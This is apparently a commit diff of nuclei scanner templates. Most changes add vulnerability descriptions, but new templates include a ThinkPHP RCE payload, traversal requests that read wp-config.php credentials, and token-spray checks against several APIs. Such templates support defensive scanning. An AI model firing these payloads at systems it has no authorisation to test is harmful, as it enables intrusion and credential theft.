name: Strava API Test
author: dwisiswant0
reference: https://developers.strava.com/docs/getting-started/
severity: info
tags: token-spray,strava
self-contained: true
requests:
- method: GET
path:
- "https://www.strava.com/api/v3/athlete"
headers:
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- "Authorization Error"
negative: true

View File

@ -0,0 +1,23 @@
id: api-taiga
info:
name: Taiga API Test
author: dwisiswant0
reference: https://docs.taiga.io/api.html
severity: info
tags: token-spray,taiga
self-contained: true
requests:
- method: GET
path:
- "https://api.taiga.io/api/v1/application-tokens"
headers:
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- "token_not_valid"
negative: true

View File

@ -0,0 +1,22 @@
id: api-thecatapi
info:
name: TheCatApi API Test
author: daffainfo
severity: info
reference: https://docs.thecatapi.com/
tags: token-spray,thecatapi
self-contained: true
requests:
- method: GET
path:
- "https://api.thecatapi.com/v1/votes"
headers:
x-api-key: "{{token}}"
matchers:
- type: status
negative: true
status:
- 401

View File

@ -0,0 +1,23 @@
id: api-webex
info:
name: Cisco Webex API Test
author: dwisiswant0
severity: info
reference: https://developer.webex.com/docs/getting-started
tags: token-spray,cisco,webex
self-contained: true
requests:
- method: GET
path:
- "https://webexapis.com/v1/rooms"
headers:
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- "errors"
negative: true

View File

@ -3,6 +3,7 @@ info:
name: Seeyon WooYun LFR name: Seeyon WooYun LFR
author: princechaddha author: princechaddha
severity: high severity: high
description: A vulnerability in Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker.
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
tags: seeyon,wooyun,lfi tags: seeyon,wooyun,lfi

View File

@ -3,6 +3,7 @@ info:
name: Maccmsv10 Backdoor name: Maccmsv10 Backdoor
author: princechaddha author: princechaddha
severity: critical severity: critical
description: A backdoor has been found in Maccmsv10, the backdoor is accessible via the '/index.php/bbs/index/download' endpoint and the special 'getpwd' parameter value of 'WorldFilledWithLove'.
tags: maccmsv10,rce tags: maccmsv10,rce
requests: requests:

View File

@ -4,6 +4,7 @@ info:
author: pikpikcu author: pikpikcu
severity: high severity: high
reference: https://paper.seebug.org/676/ reference: https://paper.seebug.org/676/
description: A vulnerability in MetInfo allows remote unauthenticated attackers access to locally stored files and their content.
tags: metinfo,lfi tags: metinfo,lfi
requests: requests:

View File

@ -4,6 +4,7 @@ info:
name: OpenSNS Remote Code Execution Vulnerability name: OpenSNS Remote Code Execution Vulnerability
author: gy741 author: gy741
severity: critical severity: critical
description: A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint.
reference: reference:
- http://www.0dayhack.net/index.php/2417/ - http://www.0dayhack.net/index.php/2417/
- https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E

View File

@ -3,6 +3,7 @@ id: php-zerodium-backdoor-rce
info: info:
name: PHP Zerodium Backdoor RCE name: PHP Zerodium Backdoor RCE
author: dhiyaneshDk author: dhiyaneshDk
description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code.
reference: https://news-web.php.net/php.internals/113838 reference: https://news-web.php.net/php.internals/113838
severity: critical severity: critical
tags: php,backdoor tags: php,backdoor

View File

@ -4,6 +4,7 @@ info:
name: ProcessMaker <= 3.5.4 Directory Traversal name: ProcessMaker <= 3.5.4 Directory Traversal
author: KrE80r author: KrE80r
severity: high severity: high
description: A vulnerability in ProcessMaker allows remote attackers to access arbitrary files and disclose their content.
reference: reference:
- https://www.exploit-db.com/exploits/50229 - https://www.exploit-db.com/exploits/50229
- https://www.processmaker.com - https://www.processmaker.com

View File

@ -5,6 +5,7 @@ info:
author: dwisiswant0 author: dwisiswant0
severity: high severity: high
tags: rconfig,rce tags: rconfig,rce
description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint.
reference: reference:
- https://www.rconfig.com/downloads/rconfig-3.9.5.zip - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
- https://www.exploit-db.com/exploits/48878 - https://www.exploit-db.com/exploits/48878

View File

@ -4,6 +4,7 @@ info:
name: RockMongo V1.1.8 XSS name: RockMongo V1.1.8 XSS
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application.
reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
tags: rockmongo,xss tags: rockmongo,xss

View File

@ -4,8 +4,9 @@ info:
name: Ruijie EG cli.php RCE name: Ruijie EG cli.php RCE
author: pikpikcu author: pikpikcu
severity: critical severity: critical
description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen.
reference: reference:
- http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
- https://www.ruijienetworks.com - https://www.ruijienetworks.com
tags: ruijie,rce tags: ruijie,rce

View File

@ -4,6 +4,7 @@ info:
name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI
author: pikpikcu author: pikpikcu
severity: high severity: high
description: A vulnerability in Ruijie Networks Switch allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint.
reference: https://exploit-db.com/exploits/48755 reference: https://exploit-db.com/exploits/48755
tags: ruijie,lfi tags: ruijie,lfi

View File

@ -4,6 +4,7 @@ info:
name: Sangfor EDR 3.2.17R1/3.2.21 RCE name: Sangfor EDR 3.2.17R1/3.2.21 RCE
author: pikpikcu author: pikpikcu
severity: critical severity: critical
description: A vulnerability in Sangfor EDR product allows remote unauthenticated users to cause the product to execute arbitrary commands.
reference: https://www.cnblogs.com/0day-li/p/13650452.html reference: https://www.cnblogs.com/0day-li/p/13650452.html
tags: rce tags: rce

View File

@ -4,6 +4,7 @@ info:
name: SAP wide open redirect name: SAP wide open redirect
author: Gal Nagli author: Gal Nagli
severity: medium severity: medium
description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice.
tags: redirect,sap tags: redirect,sap

View File

@ -3,6 +3,7 @@ info:
name: SeaCMS V6.4.5 RCE name: SeaCMS V6.4.5 RCE
author: pikpikcu author: pikpikcu
severity: high severity: high
description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code.
reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/
tags: seacms,rce tags: seacms,rce

View File

@ -4,7 +4,7 @@ info:
name: Solar-Log 500 2.8.2 - Incorrect Access Control name: Solar-Log 500 2.8.2 - Incorrect Access Control
author: geeknik author: geeknik
severity: high severity: high
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers> description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server
reference: https://www.exploit-db.com/exploits/49986 reference: https://www.exploit-db.com/exploits/49986
tags: solarlog,auth-bypass tags: solarlog,auth-bypass

View File

@ -4,6 +4,7 @@ info:
name: Sonicwall SSLVPN ShellShock RCE name: Sonicwall SSLVPN ShellShock RCE
author: PR3R00T author: PR3R00T
severity: critical severity: critical
description: A vulnerability in Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.
reference: reference:
- https://twitter.com/chybeta/status/1353974652540882944 - https://twitter.com/chybeta/status/1353974652540882944
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

View File

@ -4,6 +4,7 @@ info:
name: TurboCRM XSS name: TurboCRM XSS
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application.
reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a
tags: xss,turbocrm tags: xss,turbocrm

View File

@ -4,6 +4,7 @@ info:
name: Twig PHP <2.4.4 template engine - SSTI name: Twig PHP <2.4.4 template engine - SSTI
author: madrobot author: madrobot
severity: high severity: high
description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability.
tags: php,ssti tags: php,ssti
requests: requests:

View File

@ -3,6 +3,7 @@ info:
name: UEditor Arbitrary File Upload name: UEditor Arbitrary File Upload
author: princechaddha author: princechaddha
severity: high severity: high
description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code.
reference: reference:
- https://zhuanlan.zhihu.com/p/85265552 - https://zhuanlan.zhihu.com/p/85265552
- https://www.freebuf.com/vuls/181814.html - https://www.freebuf.com/vuls/181814.html

View File

@ -3,6 +3,7 @@ info:
name: Unauthenticated Hoteldruid Panel name: Unauthenticated Hoteldruid Panel
author: princechaddha author: princechaddha
severity: high severity: high
description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication.
reference: https://www.hoteldruid.com/ reference: https://www.hoteldruid.com/
tags: hoteldruid,panel,unauth tags: hoteldruid,panel,unauth

View File

@ -3,6 +3,7 @@ info:
name: Unauthenticated Spark REST API name: Unauthenticated Spark REST API
author: princechaddha author: princechaddha
severity: medium severity: medium
description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it.
reference: https://xz.aliyun.com/t/2490 reference: https://xz.aliyun.com/t/2490
tags: spark,unauth tags: spark,unauth

View File

@ -4,6 +4,7 @@ info:
name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection. name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
author: geeknik author: geeknik
severity: low severity: low
description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned.
reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
tags: crlf,viewlinc tags: crlf,viewlinc

View File

@ -4,6 +4,7 @@ info:
name: Vehicle Parking Management System 1.0 - Authentication Bypass name: Vehicle Parking Management System 1.0 - Authentication Bypass
author: dwisiswant0 author: dwisiswant0
severity: high severity: high
description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
reference: https://www.exploit-db.com/exploits/48877 reference: https://www.exploit-db.com/exploits/48877
tags: auth-bypass tags: auth-bypass
requests: requests:

View File

@ -3,6 +3,7 @@ info:
name: WebUI 1.5b6 RCE name: WebUI 1.5b6 RCE
author: pikpikcu author: pikpikcu
severity: critical severity: critical
description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
reference: https://www.exploit-db.com/exploits/36821 reference: https://www.exploit-db.com/exploits/36821
tags: webui,rce tags: webui,rce

View File

@ -5,7 +5,7 @@ info:
author: pikpikcu author: pikpikcu
severity: medium severity: medium
tags: xss tags: xss
description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter.
reference: reference:
- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html

View File

@ -5,6 +5,7 @@ info:
author: pikpikcu author: pikpikcu
severity: critical severity: critical
tags: yapi,rce tags: yapi,rce
description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.
reference: reference:
- https://www.secpulse.com/archives/162502.html - https://www.secpulse.com/archives/162502.html
- https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b

View File

@ -5,6 +5,7 @@ info:
author: pdteam author: pdteam
severity: low severity: low
tags: apache,rce tags: apache,rce
description: A vulnerability in Apache Yarn ResourceManager allows remote unauthenticated users to cause the product to execute arbitrary code.
reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6 reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6
requests: requests:

View File

@ -1,9 +1,10 @@
id: zhiyuan-file-upload id: zhiyuan-file-upload
info: info:
name: Zhiyuan Oa arbitrary file upload vulnerability name: Zhiyuan OA arbitrary file upload vulnerability
author: gy741 author: gy741
severity: critical severity: critical
description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed.
reference: https://www.programmersought.com/article/92658169875/ reference: https://www.programmersought.com/article/92658169875/
tags: zhiyuan,rce tags: zhiyuan,rce

View File

@ -1,9 +1,10 @@
id: zhiyuan-oa-session-leak id: zhiyuan-oa-session-leak
info: info:
name: Zhiyuan Oa Session Leak name: Zhiyuan OA Session Leak
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.
reference: https://www.zhihuifly.com/t/topic/3345 reference: https://www.zhihuifly.com/t/topic/3345
tags: zhiyuan,leak,disclosure tags: zhiyuan,leak,disclosure

View File

@ -4,6 +4,7 @@ info:
name: Zimbra Collaboration Suite (ZCS) - SSRF name: Zimbra Collaboration Suite (ZCS) - SSRF
author: gy741 author: gy741
severity: critical severity: critical
description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.
reference: reference:
- https://www.adminxe.com/2183.html - https://www.adminxe.com/2183.html
tags: zimbra,ssrf,oast tags: zimbra,ssrf,oast

View File

@ -4,6 +4,7 @@ info:
name: Zoo Management System 1.0 - Authentication Bypass name: Zoo Management System 1.0 - Authentication Bypass
author: dwisiswant0 author: dwisiswant0
severity: high severity: high
description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability.
reference: https://www.exploit-db.com/exploits/48880 reference: https://www.exploit-db.com/exploits/48880
tags: auth-bypass,zms tags: auth-bypass,zms

View File

@ -0,0 +1,27 @@
id: thinkphp-501-rce
info:
name: ThinkPHP 5.0.1 RCE
author: lark-lab
severity: critical
tags: thinkphp,rce
requests:
- method: POST
path:
- "{{BaseURL}}/?s=index/index/index"
body: "s=phpinfo()&_method=__construct&filter=assert"
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200

View File

@ -4,6 +4,7 @@ info:
name: SMTP WP Plugin Directory listing enabled name: SMTP WP Plugin Directory listing enabled
author: PR3R00T author: PR3R00T
severity: high severity: high
description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access.
reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
tags: wordpress,wp-plugin tags: wordpress,wp-plugin

View File

@ -4,6 +4,7 @@ info:
name: WordPress Attitude Themes 1.1.1 Open Redirection name: WordPress Attitude Themes 1.1.1 Open Redirection
author: 0x_Akoko author: 0x_Akoko
severity: low severity: low
description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
reference: https://cxsecurity.com/issue/WLB-2020030183 reference: https://cxsecurity.com/issue/WLB-2020030183
tags: wordpress,wp-theme,redirect tags: wordpress,wp-theme,redirect

View File

@ -4,6 +4,7 @@ info:
name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection
author: 0x_Akoko author: 0x_Akoko
severity: low severity: low
description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL.
reference: https://cxsecurity.com/issue/WLB-2020040103 reference: https://cxsecurity.com/issue/WLB-2020040103
tags: wordpress,wp-plugin,redirect tags: wordpress,wp-plugin,redirect

View File

@ -3,6 +3,7 @@ info:
name: WordPress accessible wp-config name: WordPress accessible wp-config
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
severity: high severity: high
description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading.
tags: wordpress,backup tags: wordpress,backup
requests: requests:

View File

@ -0,0 +1,29 @@
id: wp-javospot-lfi
info:
name: Javo Spot Premium Theme - Unauthenticated Directory Traversal
author: 0x_Akoko
severity: high
reference:
- https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
- https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
- https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068
tags: wordpress,wp-theme,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200

View File

@ -4,6 +4,7 @@ info:
name: WordPress Oxygen-Theme Themes LFI name: WordPress Oxygen-Theme Themes LFI
author: 0x_Akoko author: 0x_Akoko
severity: high severity: high
description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter.
tags: wordpress,wp-theme,lfi tags: wordpress,wp-theme,lfi
reference: https://cxsecurity.com/issue/WLB-2019030178 reference: https://cxsecurity.com/issue/WLB-2019030178

View File

@ -0,0 +1,29 @@
id: wp-tinymce-lfi
info:
name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI
author: 0x_Akoko
severity: high
description: The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability.
reference:
- https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400
- http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/
tags: wordpress,wp-theme,lfi,wordpress,tinymce
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200

View File

@ -4,7 +4,7 @@ info:
name: wordpress-upload-data name: wordpress-upload-data
author: pussycat0x author: pussycat0x
severity: medium severity: medium
description: Searches for Passwords in the wordpress uploads directory. description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
reference: https://www.exploit-db.com/ghdb/7040 reference: https://www.exploit-db.com/ghdb/7040
tags: wordpress,listing tags: wordpress,listing

View File

@ -4,7 +4,7 @@ info:
name: Woocommerce PDF Invoice Exposure name: Woocommerce PDF Invoice Exposure
author: mohammedsaneem,sec_hawk author: mohammedsaneem,sec_hawk
severity: medium severity: medium
description: Allows attacker to view sensitive information such as company invoices description: A vulnerability in Woocommerce allows remote unauthenticated attackers to access company invoices and other sensitive information.
reference: reference:
- https://twitter.com/sec_hawk/status/1426984595094913025?s=21 - https://twitter.com/sec_hawk/status/1426984595094913025?s=21
- https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml - https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml

View File

@ -4,6 +4,14 @@ info:
name: WPTouch Switch Desktop 3.x Open Redirection name: WPTouch Switch Desktop 3.x Open Redirection
author: 0x_Akoko author: 0x_Akoko
severity: medium severity: medium
description: |
WordPress WPTouch Switch Desktop 3.x accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
An HTTPparameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.
Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
The WPtouch plugin for WordPress is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible.
reference: https://cxsecurity.com/issue/WLB-2020030114 reference: https://cxsecurity.com/issue/WLB-2020030114
tags: wp-plugin,redirect,wordpress tags: wp-plugin,redirect,wordpress

View File

@ -0,0 +1,12 @@
id: hikvision-workflow
info:
name: Hikvision Security Checks
author: pdteam
description: A simple workflow that runs all Hikvision related nuclei templates on a given target.
workflows:
- template: technologies/hikvision-detection.yaml
subtemplates:
- template: cves/2021/CVE-2021-36260.yaml